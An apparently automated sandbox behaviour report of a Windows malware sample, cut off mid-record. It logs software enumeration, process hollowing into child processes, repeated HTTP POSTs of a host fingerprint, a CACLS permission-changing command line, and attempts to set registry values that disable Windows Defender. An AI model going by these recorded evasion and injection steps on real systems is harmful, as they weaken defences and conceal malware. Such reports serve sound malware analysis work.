region_size: 577536
process_identifier: 2376
process_handle: 0x000002bc
3221225497 0

NtAllocateVirtualMemory

process_identifier: 2376
region_size: 229376
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000002bc
3221225496 0
Time & API Arguments Status Return Repeated

RegQueryValueExW

key_handle: 0x000003a0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: EditPlus
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003a0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Enterprise 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003a0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Chrome
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003a0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003a0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: HttpWatch Professional 9.3.39
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003a0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003a0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Google Update Helper
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003a0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Access MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003a0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Excel MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003a0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office PowerPoint MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003a0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Publisher MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003a0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Outlook MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003a0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Word MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003a0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proof (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003a0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proof (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003a0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office IME (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003a0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003a0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Enterprise 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003a0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office InfoPath MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003a0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003a0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003a0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office OneNote MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003a0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Groove MUI (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003a0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Groove Setup Metadata MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003a0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 ActiveX
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003a0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 NPAPI
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003a0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000002f4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: EditPlus
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000002f4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Enterprise 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000002f4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Chrome
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000002f4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000002f4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: HttpWatch Professional 9.3.39
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000002f4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000002f4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Google Update Helper
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000002f4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Access MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000002f4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Excel MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000002f4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office PowerPoint MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000002f4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Publisher MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000002f4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Outlook MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000002f4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Word MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000002f4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proof (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000002f4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proof (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000002f4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office IME (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000002f4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000002f4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Enterprise 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000002f4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office InfoPath MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000002f4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000002f4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000002f4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office OneNote MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000002f4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Groove MUI (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}\DisplayName
1 0 0
Process injection Process 2084 called NtSetContextThread to modify thread in remote process 320
Process injection Process 2444 called NtSetContextThread to modify thread in remote process 2684
Process injection Process 2716 called NtSetContextThread to modify thread in remote process 2860
Process injection Process 2124 called NtSetContextThread to modify thread in remote process 2272
Process injection Process 1484 called NtSetContextThread to modify thread in remote process 504
Process injection Process 1336 called NtSetContextThread to modify thread in remote process 1764
Time & API Arguments Status Return Repeated

NtSetContextThread

registers.eip: 1995571652
registers.esp: 6159576
registers.edi: 0
registers.eax: 4281823
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000002b8
process_identifier: 320
1 0 0

NtSetContextThread

registers.eip: 1995571652
registers.esp: 5504048
registers.edi: 0
registers.eax: 4309854
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000002b8
process_identifier: 2684
1 0 0

NtSetContextThread

registers.eip: 1995571652
registers.esp: 2554152
registers.edi: 0
registers.eax: 4281823
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000002bc
process_identifier: 2860
1 0 0

NtSetContextThread

registers.eip: 1995571652
registers.esp: 2620656
registers.edi: 0
registers.eax: 4281823
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000002b4
process_identifier: 2272
1 0 0

NtSetContextThread

registers.eip: 1995571652
registers.esp: 5503700
registers.edi: 0
registers.eax: 4281823
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000002b8
process_identifier: 504
1 0 0

NtSetContextThread

registers.eip: 1995571652
registers.esp: 4126804
registers.edi: 0
registers.eax: 4309854
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000002b8
process_identifier: 1764
1 0 0
Time & API Arguments Status Return Repeated

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.81&sd=f9a925&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.81&sd=f9a925&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.81&sd=f9a925&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.81&sd=f9a925&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.81&sd=f9a925&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.81&sd=f9a925&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.81&sd=f9a925&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.81&sd=f9a925&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.81&sd=f9a925&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.81&sd=f9a925&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.81&sd=f9a925&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.81&sd=f9a925&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0
Process injection Process 2084 resumed a thread in remote process 320
Process injection Process 2444 resumed a thread in remote process 2684
Process injection Process 2716 resumed a thread in remote process 2860
Process injection Process 2124 resumed a thread in remote process 2272
Process injection Process 1484 resumed a thread in remote process 504
Process injection Process 1336 resumed a thread in remote process 1764
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x000002b8
suspend_count: 1
process_identifier: 320
1 0 0

NtResumeThread

thread_handle: 0x000002b8
suspend_count: 1
process_identifier: 2684
1 0 0

NtResumeThread

thread_handle: 0x000002bc
suspend_count: 1
process_identifier: 2860
1 0 0

NtResumeThread

thread_handle: 0x000002b4
suspend_count: 1
process_identifier: 2272
1 0 0

NtResumeThread

thread_handle: 0x000002b8
suspend_count: 1
process_identifier: 504
1 0 0

NtResumeThread

thread_handle: 0x000002b8
suspend_count: 1
process_identifier: 1764
1 0 0
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y|CACLS "..\c3912af058" /P "test22:N"&&CACLS "..\c3912af058" /P "test22:R" /E&&Exit
cmdline CACLS "oneetx.exe" /P "test22:N"
cmdline CACLS "..\c3912af058" /P "test22:R" /E
cmdline CACLS "..\c3912af058" /P "test22:N"
cmdline cmd /k echo Y|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y|CACLS "..\c3912af058" /P "test22:N"&&CACLS "..\c3912af058" /P "test22:R" /E&&Exit
cmdline CACLS "oneetx.exe" /P "test22:R" /E
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2612
thread_handle: 0x0000001c
process_identifier: 2608
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\IXP000.TMP\v3703114.exe
filepath_r:
stack_pivoted: 0
creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x00000124
1 1 0

CreateProcessInternalW

thread_identifier: 2460
thread_handle: 0x00000124
process_identifier: 2444
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\IXP000.TMP\d7677923.exe
filepath_r:
stack_pivoted: 0
creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x0000001c
1 1 0

CreateProcessInternalW

thread_identifier: 2692
thread_handle: 0x0000001c
process_identifier: 2688
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\IXP001.TMP\v0482713.exe
filepath_r:
stack_pivoted: 0
creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x00000124
1 1 0

CreateProcessInternalW

thread_identifier: 2088
thread_handle: 0x00000124
process_identifier: 2084
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\IXP001.TMP\c6805445.exe
filepath_r:
stack_pivoted: 0
creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x0000001c
1 1 0

CreateProcessInternalW

thread_identifier: 2736
thread_handle: 0x0000001c
process_identifier: 2732
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\IXP002.TMP\a9556928.exe
filepath_r:
stack_pivoted: 0
creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x00000124
1 1 0

CreateProcessInternalW

thread_identifier: 2892
thread_handle: 0x00000124
process_identifier: 2888
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\IXP002.TMP\b0495250.exe
filepath_r:
stack_pivoted: 0
creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x0000001c
1 1 0

NtResumeThread

thread_handle: 0x00000190
suspend_count: 1
process_identifier: 2732
1 0 0

NtResumeThread

thread_handle: 0x00000208
suspend_count: 1
process_identifier: 2732
1 0 0

NtResumeThread

thread_handle: 0x00000244
suspend_count: 1
process_identifier: 2732
1 0 0

NtResumeThread

thread_handle: 0x00000184
suspend_count: 1
process_identifier: 2888
1 0 0

NtResumeThread

thread_handle: 0x000001fc
suspend_count: 1
process_identifier: 2888
1 0 0

NtResumeThread

thread_handle: 0x00000240
suspend_count: 1
process_identifier: 2888
1 0 0

NtResumeThread

thread_handle: 0x000003a8
suspend_count: 1
process_identifier: 2888
1 0 0

NtGetContextThread

thread_handle: 0x00000190
1 0 0

NtGetContextThread

thread_handle: 0x00000190
1 0 0

NtResumeThread

thread_handle: 0x00000190
suspend_count: 1
process_identifier: 2888
1 0 0

NtGetContextThread

thread_handle: 0x00000190
1 0 0

NtGetContextThread

thread_handle: 0x00000190
1 0 0

NtResumeThread

thread_handle: 0x00000190
suspend_count: 1
process_identifier: 2888
1 0 0

NtResumeThread

thread_handle: 0x00000184
suspend_count: 1
process_identifier: 2084
1 0 0

NtResumeThread

thread_handle: 0x000001fc
suspend_count: 1
process_identifier: 2084
1 0 0

NtResumeThread

thread_handle: 0x00000240
suspend_count: 1
process_identifier: 2084
1 0 0

NtResumeThread

thread_handle: 0x00000278
suspend_count: 1
process_identifier: 2084
1 0 0

NtGetContextThread

thread_handle: 0x00000190
1 0 0

NtGetContextThread

thread_handle: 0x00000190
1 0 0

NtResumeThread

thread_handle: 0x00000190
suspend_count: 1
process_identifier: 2084
1 0 0

NtGetContextThread

thread_handle: 0x00000190
1 0 0

NtGetContextThread

thread_handle: 0x00000190
1 0 0

NtResumeThread

thread_handle: 0x00000190
suspend_count: 1
process_identifier: 2084
1 0 0

NtResumeThread

thread_handle: 0x0000028c
suspend_count: 1
process_identifier: 2084
1 0 0

NtResumeThread

thread_handle: 0x000002a0
suspend_count: 1
process_identifier: 2084
1 0 0

CreateProcessInternalW

thread_identifier: 2064
thread_handle: 0x000002b8
process_identifier: 2136
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\IXP001.TMP\c6805445.exe
filepath_r:
stack_pivoted: 0
creation_flags: 134217740 (CREATE_NO_WINDOW|CREATE_SUSPENDED|DETACHED_PROCESS)
inherit_handles: 0
process_handle: 0x000002bc
1 1 0

NtUnmapViewOfSection

base_address: 0x00400000
region_size: 774144
process_identifier: 2136
process_handle: 0x000002bc
3221225497 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 229376
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
